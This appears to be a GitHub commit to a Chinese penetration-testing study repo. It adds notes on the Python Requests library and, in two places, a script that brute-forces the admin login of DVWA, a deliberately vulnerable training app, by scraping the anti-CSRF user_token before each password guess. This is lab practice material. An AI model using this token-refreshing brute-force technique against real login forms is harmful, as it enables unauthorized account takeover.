加了几个小脚本

lstar2 · Jun 20, 2019 · b7f6697 · b7f6697
1 parent bd33f07
commit b7f6697
Show file tree

Hide file tree

Showing 4 changed files with 154 additions and 0 deletions.
diff --git a/1earn/开发/Python/方案-实例/爆破/带token爆破.py b/1earn/开发/Python/方案-实例/爆破/带token爆破.py
@@ -0,0 +1,45 @@
+import requests, re
+from bs4 import BeautifulSoup
+
+requrl='http://<改成你自己机器IP!!!>/dvwa/vulnerabilities/brute/'
+header={
+        'Host': '<改成你自己机器IP!!!>',
+		'Cache-Control': 'max-age=0',
+		'If-None-Match': "307-52156c6a290c0",
+		'If-Modified-Since': 'Mon, 05 Oct 2015 07:51:07 GMT',
+		'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36',
+		'Accept': '*/*',
+		'Referer': 'http://192.168.153.130/dvwa/vulnerabilities/brute/index.php',
+		'Accept-Encoding': 'gzip, deflate, sdch',
+		'Accept-Language': 'zh-CN,zh;q=0.8',
+		'Cookie': 'security=high; PHPSESSID=vlalfd2e2rbtptnd8pqqn646g4'
+        }
+
+def get_token(requrl,header):
+    req = requests.get(url=requrl,headers=header)
+    page = req.text
+    soup = BeautifulSoup(page,"html.parser")
+    value = soup.select("input[name=user_token]")
+
+    key=str(value)
+    p1 = r"(?<=value=\").+?(?=\")"
+    pattern1 = re.compile(p1)
+    matcher1 = re.search(pattern1,key)
+
+    user_token= matcher1.group(0)
+    a=str(user_token)
+    print (req.status_code,len(page))
+    return a
+
+user_token = get_token(requrl,header)
+i=0
+
+for key in open("password.txt"):
+
+    requrl = "http://<改成你自己机器IP!!!>/dvwa/vulnerabilities/brute/"+"?username=admin&password="+key.strip()+"&Login=Login&user_token="+user_token
+
+    i = i+1
+    print (i,'admin',key.strip(), end=" " )
+    user_token = get_token(requrl,header)
+    if (i == 100):
+        break
diff --git a/1earn/开发/Python/模块/网络/Requests/Requests小记.md b/1earn/开发/Python/模块/网络/Requests/Requests小记.md
@@ -0,0 +1,34 @@
+# Requests 小记
+
+- [Requests: 让 HTTP 服务人类¶](https://2.python-requests.org//zh_CN/latest/)
+
+`Requests 支持 Python 2.6—2.7以及3.3—3.7，而且能在 PyPy 下完美运行。`
+
+```python
+>>> import requests
+>>> r = requests.get('https://api.github.com/user', auth=('user', 'pass'))
+>>> r.status_code
+200
+
+>>> r.headers['content-type']
+'application/json; charset=utf8'
+
+>>> r.encoding
+'utf-8'
+
+>>> r.text
+u'{"type":"User"...'
+
+>>> r.json()
+{u'private_gists': 419, u'total_private_repos': 77, ...}
+```
+
+
+
+
+
+
+
+
+
+
diff --git a/1earn/渗透/实验/DVWA小记.md b/1earn/渗透/实验/DVWA小记.md
@@ -244,10 +244,85 @@ for line in open("rkolin.txt"):
 ```
 get_token 的功能是通过 python 的 BeautifulSoup 库从 html 页面中抓取 user_token 的值，为了方便展示，这里设置只尝试 10 次。
 
+注:在最新版本中，由于hard难度的源代码修改，无法直接使用BeautifulSoup匹配user_token值，在此给出我略微修改的版本
+```python
+import requests, re
+from bs4 import BeautifulSoup
+
+requrl='http://<改成你自己机器IP!!!>/dvwa/vulnerabilities/brute/'
+header={
+        'Host': '<改成你自己机器IP!!!>',
+		'Cache-Control': 'max-age=0',
+		'If-None-Match': "307-52156c6a290c0",
+		'If-Modified-Since': 'Mon, 05 Oct 2015 07:51:07 GMT',
+		'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36',
+		'Accept': '*/*',
+		'Referer': 'http://192.168.153.130/dvwa/vulnerabilities/brute/index.php',
+		'Accept-Encoding': 'gzip, deflate, sdch',
+		'Accept-Language': 'zh-CN,zh;q=0.8',
+		'Cookie': 'security=high; PHPSESSID=vlalfd2e2rbtptnd8pqqn646g4'
+        }
+
+def get_token(requrl,header):
+    req = requests.get(url=requrl,headers=header)
+    page = req.text
+    soup = BeautifulSoup(page,"html.parser")
+    value = soup.select("input[name=user_token]")
+
+    key=str(value)
+    p1 = r"(?<=value=\").+?(?=\")"
+    pattern1 = re.compile(p1)
+    matcher1 = re.search(pattern1,key)
+
+    user_token= matcher1.group(0)
+    a=str(user_token)
+    print (req.status_code,len(page))
+    return a
+
+user_token = get_token(requrl,header)
+i=0
+
+for key in open("password.txt"):
+
+    requrl = "http://<改成你自己机器IP!!!>/dvwa/vulnerabilities/brute/"+"?username=admin&password="+key.strip()+"&Login=Login&user_token="+user_token
+
+    i = i+1
+    print (i,'admin',key.strip(), end=" " )
+    user_token = get_token(requrl,header)
+    if (i == 100):
+        break
+```
+![image](../../../img/渗透/实验/dvwa11.png)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
 
 注: 使用 urllib 的 ProxyHandler；或者在全局环境变量中设置 http_proxy。 可以让 python 产生的 http 请求流量通过 burpsutie 的 proxy
 
 
+
+
+
+
+
+
+
+
+
+
+
 https://www.freebuf.com/articles/web/116437.html
 
 http://www.storysec.com/dvwa-sql-injection.html

diff --git a/img/渗透/实验/dvwa11.png b/img/渗透/实验/dvwa11.png